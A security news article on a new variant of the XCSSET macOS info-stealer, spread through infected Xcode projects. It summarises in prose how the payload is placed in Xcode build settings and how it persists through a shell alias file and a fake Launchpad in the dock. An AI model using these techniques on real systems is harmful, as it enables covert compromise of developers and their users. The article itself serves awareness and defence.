The XCSSET info-stealing malware is back, targeting macOS users and devs
A new, improved variant of the XCSSET macOS malware has been spotted “in limited attacks” by Microsoft’s threat researchers.
XCSSET macOS malware
XCSSET in information-stealing and backdoor-injecting malware targeting Mac users.
It’s usually distributed via infected Xcode projects – a collection of files, settings, and configurations that make up an app or framework developed using Xcode, Apple’s official integrated development environment (IDE) for macOS.
The threat has been around for years. Past variants even used zero-day vulnerabilities to perform some of its malicious actions.
It’s known to be capable of taking screenshots, stealing browser cookies and other data, grabbing data from apps such as Telegram, WeChat, Evernote, and others.
The variant now spotted by Microsoft can apparently also collect data from the Notes app, exfiltrate system information and files, and targets digital wallets. Enhanced obfuscation methods make the analysis of the malware harder.
New infection, persistence techniques
XCSSET is malware that’s seemingly aimed at a specific subset of macOS users: software developers.
“The method of distribution used can only be described as clever,” Trend Micro researchers said when they first discovered XCSSET.
“Affected developers will unwittingly distribute the malicious trojan to their users in the form of the compromised Xcode projects, and methods to verify the distributed file (such as checking hashes) would not help as the developers would be unaware that they are distributing malicious files.”
The new variant sports new infection techniques, Microsoft researchers discovered.
“[It] introduces new methods for where the payload is placed in a target Xcode project. The method is chosen from one of the following options: TARGET, RULE, or FORCED_STRATEGY. An additional method involves placing the payload inside the TARGET_DEVICE_FAMILY key under build settings and running it at a latter phase.”
The malware also uses new persistence mechanisms:
- It creates a file named ~/.zshrc_aliases, which contains the payload, and appends a command to it that will launch it every time a new shell session is initiated
- It downloads a signed dockutil tool from a command-and-control server to manage the dock items, creates a fake Launchpad application, and replaces the legitimate Launchpad’s path entry in the dock with the fake one. The result? Every time the Launchpad is started from the dock, both the legitimate Launchpad and the malicious payload are executed.
Developers should be careful when downloading or cloning Xcode projects from online repositories, websites and developer communities. Even projects provided by someone you trust should be checked, because they might not know the project has been “infected”.